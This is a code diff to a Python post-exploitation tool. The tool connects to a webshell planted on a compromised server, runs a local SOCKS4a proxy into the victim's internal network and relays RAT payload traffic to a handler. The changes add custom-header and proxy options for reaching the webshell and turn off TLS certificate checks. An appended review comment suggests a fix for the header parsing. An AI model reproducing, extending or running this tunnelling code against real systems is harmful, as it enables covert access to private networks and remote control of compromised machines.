@@ -37,6 +37,7 @@ def __init__(self):
37
37
"Accept-Language" : "zh-CN,zh;q=0.8" ,
38
38
'Accept-Encoding' : 'gzip' ,
39
39
}
40
+ self .proxy = None
40
41
self .CACHE_CONNS = {}
41
42
self .MIRROR_CHCHE_CONNS = {}
42
43
# {
@@ -65,8 +66,32 @@ def __init__(self):
65
66
self .die_client_address = []
66
67
self .mirror_die_client_address = []
67
68
self .session = requests .session ()
69
+ self .session .verify = False
68
70
threading .Thread .__init__ (self )
69
71
72
+ def custom_header (self , inputstr ):
73
+ try :
74
+ str_headers = inputstr .split ("," )
75
+ for str_header in str_headers :
76
+ header_type = str_header .split (":" )[0 ].strip ()
77
+ header_value = str_header .split (":" )[1 ].strip ()
78
+ self .headers [header_type ] = header_value
79
+ except Exception as E :
80
+ self .logger .exception (E )
81
+ return False
82
+ self .logger .info ("------------ Custom http request header ------------" )
83
+ self .logger .info (self .headers )
84
+ self .logger .info ("\n " )
85
+ return True
86
+
87
+ def custom_proxy (self , proxy ):
88
+ self .proxy = {'http' : proxy , 'https' : proxy }
89
+ self .session .proxies = self .proxy
90
+ self .logger .info ("------------ Custom http request proxy ------------" )
91
+ self .logger .info (self .proxy )
92
+ self .logger .info ("\n " )
93
+ return True
94
+
70
95
def _post_data (self , url , data = {}):
71
96
payload = {
72
97
"Remoteserver" : self .REMOTE_SERVER ,
@@ -99,7 +124,6 @@ def run(self):
99
124
while True :
100
125
self ._sync_data ()
101
126
102
-
103
127
def _sync_data (self ):
104
128
has_data = False
105
129
# 清除无效的client
@@ -286,13 +310,17 @@ def _sync_data(self):
286
310
287
311
def setc_webshell (self , WEBSHELL ):
288
312
try :
289
- r = requests .get (WEBSHELL , verify = False , timeout = 3 , headers = self .headers , )
313
+ r = requests .get (WEBSHELL , verify = False , timeout = 3 , headers = self .headers , proxies = self . proxy )
290
314
if b"UTF-8" in r .content :
291
315
self .WEBSHELL = WEBSHELL
292
316
return True
293
317
else :
294
318
return False
319
+ except requests .exceptions .ProxyError as proxyError :
320
+ self .logger .error ("Connet to proxy failed : {}" .format (self .proxy ))
321
+ return False
295
322
except Exception as E :
323
+ self .logger .exception (E )
296
324
return False
297
325
298
326
def setc_remoteserver (self , REMOTE_SERVER = None ):
@@ -497,7 +525,7 @@ def run(self):
497
525
self ._port ))
498
526
return False
499
527
500
- self .logger .info ("Socks4a ready to accept" )
528
+ self .logger .warning ("Socks4a ready to accept" )
501
529
while True :
502
530
try :
503
531
conn , addr = s .accept ()
@@ -550,22 +578,36 @@ def _process_request(self, data, client_conn, addr):
550
578
parser .add_argument ('-w' , '--webshell' , metavar = 'http://192.168.3.10:8080/proxy.jsp' ,
551
579
help = "webshell url" ,
552
580
required = True )
581
+
582
+ parser .add_argument ('--header' , metavar = 'Authorization: XXX,Cookie: XXX' ,
583
+ help = "custom http request header" ,
584
+ default = None )
585
+
586
+ parser .add_argument ('--proxy' , metavar = 'socks5://127.0.0.1:1080' ,
587
+ help = "Connect webshell through proxy" ,
588
+ default = None )
589
+
553
590
parser .add_argument ('-l' , '--locallistenaddress' , metavar = '127.0.0.1/0.0.0.0' ,
554
591
help = "local listen address for socks4" ,
555
- default = '127.0.0.1' ,
556
- required = True )
557
- parser .add_argument ('-p' , '--port' ,
558
- default = 60000 ,
592
+ default = '127.0.0.1' )
593
+ parser .add_argument ('-p' , '--locallistenport' ,
594
+ default = 10800 ,
559
595
metavar = 'N' ,
560
596
type = int ,
561
597
help = "local listen port for socks4" ,
562
598
)
563
599
564
- parser .add_argument ('-st' , '--sockettimeout' , default = 0.05 ,
600
+ parser .add_argument ('-st' , '--sockettimeout' , default = 0.2 ,
565
601
metavar = "N" ,
566
602
type = float ,
567
603
help = "socket timeout value" ,
568
604
)
605
+ parser .add_argument ('-ti' , '--targetipaddress' , metavar = '127.0.0.1' ,
606
+ help = "reverse proxy target ipaddress" ,
607
+ required = False )
608
+ parser .add_argument ('-tp' , '--targetport' , metavar = '60020' ,
609
+ help = "reverse proxy target port" ,
610
+ required = False )
569
611
parser .add_argument ('-c' , '--cleansockst' , default = False ,
570
612
nargs = '?' ,
571
613
metavar = "true" ,
@@ -578,16 +620,10 @@ def _process_request(self, data, client_conn, addr):
578
620
type = bool ,
579
621
help = "clean server exist socket(this will kill other client connect)" ,
580
622
)
581
- parser .add_argument ('-ti' , '--targetipaddress' , metavar = '127.0.0.1' ,
582
- help = "reverse proxy target ipaddress" ,
583
- required = False )
584
- parser .add_argument ('-tp' , '--targetport' , metavar = '60020' ,
585
- help = "reverse proxy target port" ,
586
- required = False )
587
623
args = parser .parse_args ()
588
624
WEBSHELL = args .webshell
589
625
LISTEN_ADDR = args .locallistenaddress
590
- LISTEN_PORT = args .port
626
+ LISTEN_PORT = args .locallistenport
591
627
592
628
CLEAN_SOCKET = args .cleansockst
593
629
if CLEAN_SOCKET is not False :
@@ -596,6 +632,18 @@ def _process_request(self, data, client_conn, addr):
596
632
CLEAN_SOCKET = False
597
633
598
634
globalClientCenter = ClientCenter ()
635
+ header = args .header
636
+ if header is not None :
637
+ flag = globalClientCenter .custom_header (header )
638
+ if flag is not True :
639
+ sys .exit (1 )
640
+
641
+
642
+ proxy = args .proxy
643
+ if proxy is not None :
644
+ flag = globalClientCenter .custom_proxy (proxy )
645
+ if flag is not True :
646
+ sys .exit (1 )
599
647
600
648
SINGLE_MODE = args .singlemode
601
649
if SINGLE_MODE is not False :
@@ -605,73 +653,80 @@ def _process_request(self, data, client_conn, addr):
605
653
else :
606
654
SINGLE_MODE = False
607
655
608
- globalClientCenter .logger .info ("Local listen checking ... " )
656
+ globalClientCenter .logger .info ("------------------- Local check ------------------- " )
609
657
flag = globalClientCenter .setc_localaddr (LISTEN_ADDR , LISTEN_PORT )
610
658
if flag :
611
- globalClientCenter .logger .info ("Local listen check pass" )
612
- globalClientCenter .logger .info ("Socks4a on {}:{}" .format (LISTEN_ADDR , LISTEN_PORT ))
659
+ globalClientCenter .logger .info ("Local listen check : pass" )
613
660
else :
614
661
globalClientCenter .logger .error (
615
662
"Local listen check failed, please check if {}:{} is available" .format (LISTEN_ADDR , LISTEN_PORT ))
616
663
globalClientCenter .logger .error (WEBSHELL )
617
- globalClientCenter .logger .info ("WEBSHELL checking ..." )
664
+ sys .exit (1 )
665
+
618
666
webshell_alive = globalClientCenter .setc_webshell (WEBSHELL )
619
667
if webshell_alive :
620
- globalClientCenter .logger .info ("WEBSHELL check pass" )
668
+ globalClientCenter .logger .info ("WEBSHELL check : pass" )
621
669
globalClientCenter .logger .info ("WEBSHELL: {}" .format (WEBSHELL ))
622
670
else :
623
671
globalClientCenter .logger .error ("WEBSHELL check failed!" )
624
672
globalClientCenter .logger .error (WEBSHELL )
625
673
sys .exit (1 )
626
- globalClientCenter . logger . info ( "REMOTE_SERVER checking ..." )
674
+
627
675
result = globalClientCenter .setc_remoteserver ()
628
676
if result is None :
629
677
globalClientCenter .logger .error ("Read REMOTE_SERVER failed,please check whether server is running" )
630
678
sys .exit (1 )
631
679
else :
632
680
MIRROR_LISTEN = "127.0.0.1:60020"
633
- globalClientCenter .logger .info ("REMOTE_SERVER check pass" )
634
- globalClientCenter .logger .info ("------------------- Sever Config -------------------" )
681
+ globalClientCenter .logger .info ("REMOTE_SERVER check : pass" )
682
+ globalClientCenter .logger .info ("\n " )
683
+ globalClientCenter .logger .info ("------------------- Get Sever Config -------------------" )
635
684
for key in result :
636
685
globalClientCenter .logger .info ("{} : {}" .format (key , result .get (key )))
637
686
if key == "MIRROR_LISTEN" :
638
687
MIRROR_LISTEN = result .get (key )
688
+ globalClientCenter .logger .info ("\n " )
689
+
690
+ globalClientCenter .logger .info ("------------------- Set Sever Config -------------------" )
691
+ # 是否清理已有连接
639
692
if CLEAN_SOCKET :
640
693
flag = globalClientCenter .send_cmd ("CLEAN_SOCKET" )
641
694
globalClientCenter .logger .info ("CLEAN_SOCKET cmd : {}" .format (flag ))
642
695
696
+ # server建立内网tcp连接的超时时间,超时时间越长速度越慢
643
697
sockettimeout = args .sockettimeout
644
698
if sockettimeout != DEFAULT_SOCKET_TIMEOUT :
645
699
flag = globalClientCenter .sets_config ("SOCKET_TIMEOUT" , sockettimeout )
646
700
globalClientCenter .logger .info ("Set server SOCKET_TIMEOUT => {}" .format (flag ))
647
-
648
701
globalClientCenter .SOCKET_TIMEOUT = sockettimeout
702
+ globalClientCenter .logger .info ("\n " )
649
703
704
+ # 映射到本地的地址
650
705
TARGET_IP = args .targetipaddress
651
706
if TARGET_IP is None :
652
707
globalClientCenter .TARGET_IP = MIRROR_LISTEN .split (":" )[0 ]
653
708
else :
654
709
globalClientCenter .TARGET_IP = TARGET_IP
655
710
711
+ # 映射到本地的端口
656
712
TARGET_PORT = args .targetport
657
713
if TARGET_PORT is None :
658
714
globalClientCenter .TARGET_PORT = int (MIRROR_LISTEN .split (":" )[1 ])
659
715
else :
660
716
globalClientCenter .TARGET_PORT = int (TARGET_PORT )
661
- globalClientCenter .logger .info (
662
- "TARGET_ADDRESS : {}:{}" .format (globalClientCenter .TARGET_IP , globalClientCenter .TARGET_PORT ))
663
-
664
717
665
-
666
- globalClientCenter .logger .info ("------------------- RAT Config -------------------" )
718
+ globalClientCenter . logger . info ( "------------------! RAT Config !------------------" )
719
+ globalClientCenter .logger .info ("Socks4a on {}:{}" . format ( LISTEN_ADDR , LISTEN_PORT ) )
667
720
globalClientCenter .logger .info (
668
- "Handler/LISTEN should listen on {}:{}" .format (globalClientCenter .TARGET_IP , globalClientCenter .TARGET_PORT ))
721
+ "Handler/LISTENER should listen on {}:{}" .format (globalClientCenter .TARGET_IP , globalClientCenter .TARGET_PORT ))
669
722
globalClientCenter .logger .info (
670
723
"Payload should connect to {}" .format (MIRROR_LISTEN ))
724
+ globalClientCenter .logger .info ("------------------! RAT Config !------------------\n " )
725
+
671
726
# 启动服务
672
727
globalClientCenter .setDaemon (True )
673
728
674
- t2 = Socks4aProxy (host = args .locallistenaddress , port = args .port , timeout = sockettimeout , bufsize = BUFSIZE )
729
+ t2 = Socks4aProxy (host = args .locallistenaddress , port = args .locallistenport , timeout = sockettimeout , bufsize = BUFSIZE )
675
730
t2 .setDaemon (True )
676
731
677
732
globalClientCenter .start ()
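Review bot: In the `@@ -65,8 +66,32 @@` hunk, `custom_header` splits each entry on every `:` and keeps only index 1, so any value that itself contains a colon (a `Referer`/`Origin` URL, a `Host` with a port, a cookie value with a colon) is silently truncated before it is stored in `self.headers`. Splitting on the first colon only keeps the whole value: `header_type, sep, header_value = str_header.partition(":")`, `if not sep or not header_type.strip(): raise ValueError("bad header entry: {!r}".format(str_header))`, `self.headers[header_type.strip()] = header_value.strip()`. The explicit raise keeps today's outcome for a malformed entry (the missing list element currently raises IndexError, which the `except Exception` turns into `return False`) and additionally rejects an entry with an empty name, which the current code accepts as the key `""`. Entries are split on `,` before this parse, so a value containing a comma still cannot be expressed; that limit is worth stating in the `--header` help text added in the `@@ -550,22 +578,36 @@` hunk.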